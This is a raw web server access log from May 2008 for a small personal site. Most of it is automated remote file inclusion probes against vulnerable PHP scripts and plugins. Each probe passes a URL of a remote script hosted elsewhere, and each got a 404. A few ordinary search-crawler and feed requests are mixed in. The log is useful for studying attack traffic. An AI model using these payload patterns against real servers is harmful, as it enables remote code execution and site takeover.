201.236.111.227 - - [26/May/2008:17:39:51 -0700] "GET /logs/access_080407.log//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:17:42:05 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:17:42:05 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:17:44:29 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:17:44:49 -0700] "GET /logs/access_080407.log//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:17:48:55 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:17:49:04 -0700] "GET /logs/access_080407.log//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.6.18.216 - - [26/May/2008:18:08:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "notahamsandwich.com"
72.30.179.247 - - [26/May/2008:18:08:16 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "notahamsandwich.com"
89.248.102.164 - - [26/May/2008:18:13:27 -0700] "GET /logs/access.log HTTP/1.0" 200 77402 "-" "Wget/1.10.2" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:18:16:43 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
74.6.22.181 - - [26/May/2008:18:17:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "notahamsandwich.com"
74.6.22.181 - - [26/May/2008:18:17:09 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "notahamsandwich.com"
72.34.226.62 - - [26/May/2008:18:48:55 -0700] "GET //skin/zero_vote/error.php?dir=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:18:48:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:18:48:55 -0700] "GET /logs/access.log%22%20class=%22searchlinktitle%22%20title=%22www.notahamsandwich.com/logs/access.log%22%20onMouseOver=%22window.status='www.notahamsandwich.com/logs//skin/zero_vote/error.php?dir=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.notahamsandwich.com"
64.202.117.159 - - [26/May/2008:18:56:08 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
64.202.117.159 - - [26/May/2008:18:56:08 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
64.202.117.159 - - [26/May/2008:18:56:08 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:19:16:44 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
89.218.85.18 - - [26/May/2008:19:49:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
89.218.85.18 - - [26/May/2008:19:54:10 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
89.218.85.18 - - [26/May/2008:19:54:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
209.163.169.99 - - [26/May/2008:19:58:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
209.163.169.99 - - [26/May/2008:19:58:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.14.199.38 - - [26/May/2008:20:16:44 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
64.106.143.80 - - [26/May/2008:20:19:30 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
64.106.143.80 - - [26/May/2008:20:19:31 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
64.106.143.80 - - [26/May/2008:20:19:31 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:19:52 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:19:52 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:19:52 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:20:29 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:20:29 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:20:29 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
64.106.143.80 - - [26/May/2008:20:20:39 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:20:41 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:21:28 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
67.205.76.81 - - [26/May/2008:20:22:25 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
67.205.76.81 - - [26/May/2008:20:22:25 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
67.205.76.81 - - [26/May/2008:20:22:25 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
67.205.76.81 - - [26/May/2008:20:23:45 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
85.17.111.38 - - [26/May/2008:20:26:45 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.notahamsandwich.com"
85.17.111.38 - - [26/May/2008:20:26:45 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.notahamsandwich.com"
209.62.80.134 - - [26/May/2008:20:27:12 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.notahamsandwich.com"
209.62.80.134 - - [26/May/2008:20:27:12 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.notahamsandwich.com"
198.106.22.9 - - [26/May/2008:20:28:20 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
198.106.22.9 - - [26/May/2008:20:28:20 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
198.106.22.9 - - [26/May/2008:20:28:21 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
198.106.22.9 - - [26/May/2008:20:29:24 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:30:15 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:30:15 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:30:16 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:35 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:35 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:35 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:51 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:51 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:51 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:52 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:52 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:30:53 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:31:20 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:31:50 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:31:53 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.200.210 - - [26/May/2008:20:31:59 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.disciplesofdestiny.net/shoutbox/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
222.122.13.106 - - [26/May/2008:20:32:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
222.122.13.106 - - [26/May/2008:20:32:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:36:49 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:36:49 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:36:49 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.9.228.149 - - [26/May/2008:20:37:44 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:38:30 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:38:30 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:38:30 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
91.121.106.117 - - [26/May/2008:20:39:20 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:42:46 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:42:47 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:42:47 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.72.119.227 - - [26/May/2008:20:43:29 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
64.72.119.227 - - [26/May/2008:20:43:30 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
59.106.13.131 - - [26/May/2008:20:43:46 -0700] "GET /logs/access_080407.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.38.4.3 - - [26/May/2008:20:48:25 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.notahamsandwich.com"
64.38.4.3 - - [26/May/2008:20:48:26 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.notahamsandwich.com"
72.3.133.251 - - [26/May/2008:20:49:14 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/kenthu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
72.3.133.251 - - [26/May/2008:20:49:14 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/kenthu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
85.214.72.189 - - [26/May/2008:20:49:15 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://batamload.bravehost.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.notahamsandwich.com"
85.214.72.189 - - [26/May/2008:20:49:15 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://batamload.bravehost.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.notahamsandwich.com"
203.247.36.34 - - [26/May/2008:20:53:35 -0700] "GET /logs/access_080414.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
203.247.36.34 - - [26/May/2008:20:53:35 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
203.247.36.34 - - [26/May/2008:20:53:36 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:20:55:49 -0700] "GET /logs/access.log%22%20class=%22searchlinktitle%22%20title=%22www.notahamsandwich.com/logs/access.log%22%20onMouseOver=%22window.status='www.notahamsandwich.com/logs//ashnews.php?pathtoashnews=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:20:55:49 -0700] "GET //ashnews.php?pathtoashnews=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:20:55:49 -0700] "GET /logs//ashnews.php?pathtoashnews=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.notahamsandwich.com"
203.247.36.34 - - [26/May/2008:20:56:06 -0700] "GET /logs/access_080421.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:21:02:29 -0700] "GET /german.php?u=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:21:02:30 -0700] "GET /logs/german.php?u=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:21:23:37 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
121.254.129.70 - - [26/May/2008:21:47:51 -0700] "GET /logs//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
121.254.129.70 - - [26/May/2008:21:47:56 -0700] "GET //ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:22:23:37 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
208.111.154.15 - - [26/May/2008:22:44:34 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.notahamsandwich.com"
